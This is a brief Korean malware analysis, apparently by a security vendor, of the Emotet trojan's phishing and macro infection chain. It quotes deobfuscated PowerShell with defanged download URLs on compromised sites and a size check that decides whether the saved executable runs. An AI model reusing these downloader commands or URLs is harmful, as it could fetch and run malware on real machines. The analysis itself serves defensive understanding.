Emotet 악성코드 분석
PLURA
Emotet(이모텟)?
- 주로 이메일을 통해 확산되는 트로이 목마
- 합법적인 이메일처럼 보이도록 가장하여 사용자가 악성 파일을 클릭하도록 유도
- 트로이 목마를 업데이트하고 기본적으로 시스템에 액세스한 다음 운영자가 추가 페이로드를 다운로드할 수 있도록 하는 악성코드 유형인 “로더"로 작동하도록 구성
- 감염된 호스트에서 은행 자격 증명을 훔치거나, 피해자들로부터 돈을 갈취하는 것을 목표로 동작
Emotet 실행/분석
1. 사회 공학 기법을 이용해 공격 대상에게 메일 발송
2. 공격 대상은 의심없이 첨부 파일 다운로드
3. 파일 Open. 매크로 실행을 위해 ‘Enable Content’ 클릭
4. Base64 인코딩된 코드 PowerShell 프로세스로 실행 시도
5. PowerShell 명령어에 의해 conhost 실행
6. PowerShell 스크립트 코드 실행
7. PowerShell 스크립트 코드 분석
-
아래 URL 에서 파일 다운로드 new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxp://blockchainjoblist.com/wp-admin/014080/) new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxps://womenempowermentpakistan.com/wp-admin/paba5q52/) new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxps://atnimanvilla.com/wp-content/073735/) new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxps://yeuquynhnhai.com/upload/41830/) new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxps://deepikarai.com/js/4bzs6/)
-
아래 경로에 파일 저장 $env:userprofile\284.exe
-
23931 bytes 이상이면 실행 (Get-Item $env:userprofile\284.exe).LeNgTh -ge 23931
8. 사용자 폴더에 파일 생성